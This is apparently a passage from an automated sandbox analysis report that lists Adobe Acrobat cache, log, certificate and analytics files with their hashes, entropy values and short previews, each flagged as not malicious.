SHA-512:	33E8305E950211EE3040F9FB85913115DE57E550ACE29DD4D8B7F290377CCDD82E88D10110EB9CB8473808E941B56EDCBE46A6C97B49015F344D8F8BF46EBC2A
Malicious:	false
Preview:	2024/12/28-03:35:27.286 1460 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/28-03:35:27.289 1460 Recovering log #3.2024/12/28-03:35:27.289 1460 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	334
Entropy (8bit):	5.1801167539785355
Encrypted:	false
SSDEEP:	6:Sn9+q2PqLTwi2nKuAl9Ombzo2jMGIFUt8EJZmw+E9VkwOqLTwi2nKuAl9Ombzo23:G4v8wZHAa8uFUt8EJ/+ED5TwZHAa8RJ
MD5:	436D6484E9E6D0C7A7DCD121972BB1CF
SHA1:	54114162B5EB41F36BF8B603B9AB8827F63169E3
SHA-256:	B141AF53AA6248E3086D974D1EC71E0B174D386DEC120A6F7399A3CA2904BA9B
SHA-512:	46EABA4EF17FF470C49133EC5335D00C24A02219287557F7DCC723B26D9D65647BECE3739A99BCED159E753D7CDB0FDFA73BE1494C230D964FB60A81A8750929
Malicious:	false
Preview:	2024/12/28-03:35:27.381 1d28 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/28-03:35:27.382 1d28 Recovering log #3.2024/12/28-03:35:27.382 1d28 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	334
Entropy (8bit):	5.1801167539785355
Encrypted:	false
SSDEEP:	6:Sn9+q2PqLTwi2nKuAl9Ombzo2jMGIFUt8EJZmw+E9VkwOqLTwi2nKuAl9Ombzo23:G4v8wZHAa8uFUt8EJ/+ED5TwZHAa8RJ
MD5:	436D6484E9E6D0C7A7DCD121972BB1CF
SHA1:	54114162B5EB41F36BF8B603B9AB8827F63169E3
SHA-256:	B141AF53AA6248E3086D974D1EC71E0B174D386DEC120A6F7399A3CA2904BA9B
SHA-512:	46EABA4EF17FF470C49133EC5335D00C24A02219287557F7DCC723B26D9D65647BECE3739A99BCED159E753D7CDB0FDFA73BE1494C230D964FB60A81A8750929
Malicious:	false
Preview:	2024/12/28-03:35:27.381 1d28 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/28-03:35:27.382 1d28 Recovering log #3.2024/12/28-03:35:27.382 1d28 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	475
Entropy (8bit):	4.96165270016851
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqxpsBdOg2Hl/2caq3QYiub5P7E4TX:Y2sRds+6dMHlR3QYhbt7n7
MD5:	ACCB522AE87A739BDC04EB5A34975EEB
SHA1:	A41FED54445E729A85E7017A002D4FF6FCAFEC93
SHA-256:	C7106DE6A60A389FB9B4BBC9971C9922919583A3C382664F3E78DFDC2A95AE96
SHA-512:	5B35F36E3C53CC53F90AEA276934753CAD809640E7447BD9F7AAFF48FD46EFBE5FFDEEBC19770D7D0550E67624AB76571D64525F00B82430534576B3015EFF3B
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341057329405343","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149545},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.9","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF4f87fc.TMP (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	475
Entropy (8bit):	4.96165270016851
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqxpsBdOg2Hl/2caq3QYiub5P7E4TX:Y2sRds+6dMHlR3QYhbt7n7
MD5:	ACCB522AE87A739BDC04EB5A34975EEB
SHA1:	A41FED54445E729A85E7017A002D4FF6FCAFEC93
SHA-256:	C7106DE6A60A389FB9B4BBC9971C9922919583A3C382664F3E78DFDC2A95AE96
SHA-512:	5B35F36E3C53CC53F90AEA276934753CAD809640E7447BD9F7AAFF48FD46EFBE5FFDEEBC19770D7D0550E67624AB76571D64525F00B82430534576B3015EFF3B
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341057329405343","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149545},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.9","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\ab90bbcc-ce49-49f8-8504-525be5930984.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	modified
Size (bytes):	475
Entropy (8bit):	4.959853220226882
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqknyhsBdOg2HjUcaq3QYiub5P7E4TX:Y2sRdslnyydMHb3QYhbt7n7
MD5:	5D1C7D9CBFF1C66022C29ECD96167414
SHA1:	D25FB07CB38BE25A452D3B649F5DECF0D3892B4C
SHA-256:	7C4860F85E2E1A4DB0F62B5821CD356AF5A0D2D9841DF584CA21C261F7D3E690
SHA-512:	2DAAD692E764F118501D3456F01E3D54B0D7FFB42ABF42499AB5D93D18B3AEE5F2DC0CAEA031BC3DA8276FAD6DF7DB50BB82C62DD7D2E22F0CC6991641B8452C
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379934936199906","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":664714},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.9","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\b43ea298-45e5-4b34-85f2-b2fc072deac7.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	475
Entropy (8bit):	4.96165270016851
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqxpsBdOg2Hl/2caq3QYiub5P7E4TX:Y2sRds+6dMHlR3QYhbt7n7
MD5:	ACCB522AE87A739BDC04EB5A34975EEB
SHA1:	A41FED54445E729A85E7017A002D4FF6FCAFEC93
SHA-256:	C7106DE6A60A389FB9B4BBC9971C9922919583A3C382664F3E78DFDC2A95AE96
SHA-512:	5B35F36E3C53CC53F90AEA276934753CAD809640E7447BD9F7AAFF48FD46EFBE5FFDEEBC19770D7D0550E67624AB76571D64525F00B82430534576B3015EFF3B
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341057329405343","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149545},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.9","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	3878
Entropy (8bit):	5.230028171146772
Encrypted:	false
SSDEEP:	96:GICD8SBCmPAi8j0/8qbGNSwPgGYPx8xRqhm068OzHGvtnM:1CDLCmPj8j0/8qKgwPHYPx8xemT8OzHD
MD5:	0B85C08C73AF6FF1FE01DEBB63F9975B
SHA1:	A138AE2425DACF7BD3BB2353F14E8A8355AA1D18
SHA-256:	C6BFBC50D309E61607CE6514641ED5838F8C947B389F4F776460043B61D61225
SHA-512:	708CD80FFDC8F50D2849CE6DC8086BE13E49FDF252D0FE3777F816ABD76C7E9603044AE495C07D74D2EEA301BC9124F4D45915F9F9DC65DC2A207271BCE73F65
Malicious:	false
Preview:	*...#................version.1..namespace-W...o................next-map-id.1.Pnamespace-ed11ed50_1515_4296_b27c_721e1e1acdec-https://rna-resource.acrobat.com/.0.w..r................next-map-id.2.Snamespace-f62cae74_b031_4dd2_8c7b_e9ef3858dbf9-https://rna-v2-resource.acrobat.com/.1:M4.r................next-map-id.3.Snamespace-2a2b5482_c0ce_4c74_9fbc_8a8daf6ed72d-https://rna-v2-resource.acrobat.com/.2IE..o................next-map-id.4.Pnamespace-b58dfce7_364b_43da_946b_3d7546a793e5-https://rna-resource.acrobat.com/.3KQ..^...............Pnamespace-ed11ed50_1515_4296_b27c_721e1e1acdec-https://rna-resource.acrobat.com/.xK.^...............Pnamespace-b58dfce7_364b_43da_946b_3d7546a793e5-https://rna-resource.acrobat.com/.i.+a...............Snamespace-f62cae74_b031_4dd2_8c7b_e9ef3858dbf9-https://rna-v2-resource.acrobat.com/Tz.qa...............Snamespace-2a2b5482_c0ce_4c74_9fbc_8a8daf6ed72d-https://rna-v2-resource.acrobat.com/"_.o................next-map-id.5.Pnamespace-7c898a99_566e_4628_b4ec_

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	322
Entropy (8bit):	5.2002328495374455
Encrypted:	false
SSDEEP:	6:H9+q2PqLTwi2nKuAl9OmbzNMxIFUt8iYNNJZmw+S9VkwOqLTwi2nKuAl9OmbzNMT:H4v8wZHAa8jFUt8iUJ/+SD5TwZHAa84J
MD5:	4157D00B44C119BC6D85AE6D2F75D2D2
SHA1:	4DB5F7077BF14143AEF287D691600E2D21760FC7
SHA-256:	9D085BE6DBAEB58007CFCD9410A72D478FC989877DC11BF144542D041C240B77
SHA-512:	C05B88EF07731BBE05F51E65742E8380BD2FA1C3E705173179D04B5B9D0B35A78A6611C8D84C3736018C80AA5CE609D3C142ED1921100DACD3EDCE81115AFB5B
Malicious:	false
Preview:	2024/12/28-03:35:27.441 1d28 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/28-03:35:27.442 1d28 Recovering log #3.2024/12/28-03:35:27.443 1d28 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	322
Entropy (8bit):	5.2002328495374455
Encrypted:	false
SSDEEP:	6:H9+q2PqLTwi2nKuAl9OmbzNMxIFUt8iYNNJZmw+S9VkwOqLTwi2nKuAl9OmbzNMT:H4v8wZHAa8jFUt8iUJ/+SD5TwZHAa84J
MD5:	4157D00B44C119BC6D85AE6D2F75D2D2
SHA1:	4DB5F7077BF14143AEF287D691600E2D21760FC7
SHA-256:	9D085BE6DBAEB58007CFCD9410A72D478FC989877DC11BF144542D041C240B77
SHA-512:	C05B88EF07731BBE05F51E65742E8380BD2FA1C3E705173179D04B5B9D0B35A78A6611C8D84C3736018C80AA5CE609D3C142ED1921100DACD3EDCE81115AFB5B
Malicious:	false
Preview:	2024/12/28-03:35:27.441 1d28 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/28-03:35:27.442 1d28 Recovering log #3.2024/12/28-03:35:27.443 1d28 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241228083533Z-218.bmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PC bitmap, Windows 3.x format, 114 x -152 x 32, cbSize 69366, bits offset 54
Category:	dropped
Size (bytes):	69366
Entropy (8bit):	4.204910253269834
Encrypted:	false
SSDEEP:	768:4zt4+AlK+eorMFGWA30zBQED5mAG23BjHzbyPbC3UYGmWDf3cQHhhXNezmZ5GW7n:VXr+uED5mw3BjHzujComW3ZzZ5HFrsQ
MD5:	D50A539BB2E1D8B6A4598E2A639175D5
SHA1:	30A99829736A6B8A6E7F20E47BA37CCFD90F1CD0
SHA-256:	8FF4DB4C5ED4FF7CCB9FE3CB50C17105DA1F5F9EE557E2333DF1A7CBD23802DE
SHA-512:	2D3BDE6DC27F20C8F40BE5C9C7351D3A83D6A5DEE68D21AED77F5322D561F8843292498876F4B03E8774C1EA17E46485AC4C53E3074AA74AA6A652C95271EB95
Malicious:	false
Preview:	BM........6...(...r...h..... .....................................................................................................................................................................................................................................................................................................................................................................................mdl.ohn..............\|..ohp.............yM..yN..........yM..{R..........UKT.2&0.D8A.............<08.I>F................................................................................................................................................................................................................................................................................................................................................................e[d.e\d.e\d.........f\d.e\e.f\d.....sD..sD..sD..uG......sD..rD..sD......E:C.&.$.&.$.*.).....(.%.&.%.'.$.?3=...................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	86016
Entropy (8bit):	4.43880543270971
Encrypted:	false
SSDEEP:	384:ye+ci5GZiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:p1urVgazUpUTTGt
MD5:	117BBC5A52460ED8EFF417350AD80629
SHA1:	A7C793D7D1237840D3DDC961F0B9085A9BD1D67A
SHA-256:	228EA5A6CAE869ACD6E838E41D7E3CEF8F8985F1E1FF70BF2BAC7E65A36B31AD
SHA-512:	FF7F4E90E4F3A1E8CD2DC2C6E53FFA5FB287CDD752076B584DF8BF3512F6344D9044E37A03B3C1125C58D882D7ABB0FA3013622BBCFF59784F4FEF0269E8FA79
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	3.7698554813486
Encrypted:	false
SSDEEP:	48:7MGJioyVz7ioyUQoy1C7oy16oy1aeKOioy1noy1AYoy1Wioy1oioykioyBoy1noe:7xJuz7vt1mXjBirb9IVXEBodRBkZ
MD5:	10DC84589868178E8EC854B6BCB42E8A
SHA1:	E93619622999E6D5ECAAC103220106D66F5320AC
SHA-256:	B3A66F32AEC460F8BC8917D22F9D15C54926823F071926B465A467BB11C2C268
SHA-512:	14FD86E46256B202C32A80C67565E54E58B3F6B9EDC27EAD87C6FD328CA95A270A266ABC14F5BF7C3D8EAB21DDF0B05A308C09B5A155E7C90F2A8A25FBCF6294
Malicious:	false
Preview:	.... .c......F.J...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b.r.l...t...}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	Certificate, Version=3
Category:	dropped
Size (bytes):	1391
Entropy (8bit):	7.705940075877404
Encrypted:	false
SSDEEP:	24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
MD5:	0CD2F9E0DA1773E9ED864DA5E370E74E
SHA1:	CABD2A79A1076A31F21D253635CB039D4329A5E8
SHA-256:	96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
SHA-512:	3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
Malicious:	false
Preview:	0..k0..S............@.YDc.c...0....H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0....H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.\|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I......A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.\|C.t..t.....0.[q6....00\H..;..}`...).........A.......\|.;F.H..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..\|o..;.....'...}~.."......

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	192
Entropy (8bit):	2.7569015731729736
Encrypted:	false
SSDEEP:	3:kkFklVYdPtfllXlE/HT8k+sNNX8RolJuRdxLlGB9lQRYwpDdt:kKrdPeT8sNMa8RdWBwRd
MD5:	84B62D3346B1148052A29092A7EFF2F5
SHA1:	877992370724DDC6443756E789BD62CD5ED33B31
SHA-256:	6F8C700AAE80B61A8B3D68BD70F052AF56D9C25CEDEFBA91B7C58A70EDB72751
SHA-512:	10F8B8B091082C007F9124F072F8DE0A1AB84F03D7A5721355E12CDF5A7D17DF216552F174936BE07F7BC916F56B3CBE1D7CA13920186F4E24D631F2D99B8661
Malicious:	false
Preview:	p...... .........y.x.Y..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	modified
Size (bytes):	328
Entropy (8bit):	3.241800306278292
Encrypted:	false
SSDEEP:	6:kKVFtL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:dFtiDImsLNkPlE99SNxAhUe/3
MD5:	ADB5D8F507540604AC1FDA8AB87F3A3F
SHA1:	8AD83FC6EE38B9D4513A50117210C59112DA273B
SHA-256:	33B7FAC5B1BD818184944E58F08B2A198217F060BA62D73A55F1467958ED39AF
SHA-512:	B04B85A5526D188D803F32CAE7844742862DF16D8EA4CD1223AF1F5AD5DF1230DD320A0E25CF982482F916F56E435071E60DEB4E33DB897939B59FF9005F04BF
Malicious:	false
Preview:	p...... ............Y..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.346857848381128
Encrypted:	false
SSDEEP:	6:YEQXJ2HXJrjVkgYmSg1c2LjcWkHvR0YgjHKoAvJM3g98kUwPeUkwRe9:YvXKXJdkST5LjIPYH5GMbLUkee9
MD5:	B277D2FFAAF975F6A2FF8FB85D5BC333
SHA1:	5CD45CBBCF557667310CBD2D425D4ABF5767E789
SHA-256:	5D707ABC741B808043A955CBFECAC3352FD927DF264897958E6DA4A5E969CD9A
SHA-512:	9EFBC2413C69A3D658C4DE90D579C30B5F743E62ED7C47491DD58E96D63B6D231EC3C3C40F0BD3C3637006FBDB96530BA33013914FF663F8800C7205E069317A
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"75ba7a6d-aa1a-4b90-8903-66deece19e1b","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735553348790,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.297916827872185
Encrypted:	false
SSDEEP:	6:YEQXJ2HXJrjVkgYmSg1c2LjcWkHvR0YgjHKoAvJfBoTfXpnrPeUkwRe9:YvXKXJdkST5LjIPYH5GWTfXcUkee9
MD5:	DC09CF740BCF21DA31735CB1998F4556
SHA1:	E94EE9CA01862C9E3F482CAB15E17B09868AF9B5
SHA-256:	0993302BB2F17DB2D48987BB8D04448B8F0969CD3B768EA9FB9E05073382C3C8
SHA-512:	93CC61446EBA1EBDFA12C6CE40B103551FC47FFC8EB153E51D3E6EDB923C1E38240D5A6761CA7AB035E7638A90C2DA5D493491D6E4E3F6B29457209621A3D025
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"75ba7a6d-aa1a-4b90-8903-66deece19e1b","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735553348790,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.277443010946218
Encrypted:	false
SSDEEP:	6:YEQXJ2HXJrjVkgYmSg1c2LjcWkHvR0YgjHKoAvJfBD2G6UpnrPeUkwRe9:YvXKXJdkST5LjIPYH5GR22cUkee9
MD5:	57A2CCB59545E6A378CB7965FE5ED82B
SHA1:	18091C81067CC4E038DBB8D9EF38ED59E312A545
SHA-256:	C0AF2887E5ECA68CE170A484DC450CA1231E2CB2345B5CABFD255BA4DD5F90AC
SHA-512:	F16CF03007DB04056E470BF03F74C86A5AC797352FA2E8EDB71F814549AC0057C6FCB6949FED2A868B3B4CF436F684E8842BE7FADFA88364DB4738E91A6FB968
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"75ba7a6d-aa1a-4b90-8903-66deece19e1b","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735553348790,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	285
Entropy (8bit):	5.327280739257902
Encrypted:	false
SSDEEP:	6:YEQXJ2HXJrjVkgYmSg1c2LjcWkHvR0YgjHKoAvJfPmwrPeUkwRe9:YvXKXJdkST5LjIPYH5GH56Ukee9
MD5:	8D9D0A8B3042F9540A73D4E066630E93
SHA1:	847FD06C65C6313038252E03C11896CF6D130ECE
SHA-256:	1BFC190983F9C02250228BBD949F78FAF6A3926723B8D64BE3BF80235F21E991
SHA-512:	2D23DC2E6717734E302797AC5768CC3E13CEB56CC022973DD77A2CC4F88A5B8291DA1F362FCA386FE398892B21507CB03587D2AC2D894D6B6A5BE1CCCDF8A889
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"75ba7a6d-aa1a-4b90-8903-66deece19e1b","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735553348790,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1123
Entropy (8bit):	5.686532130051762
Encrypted:	false
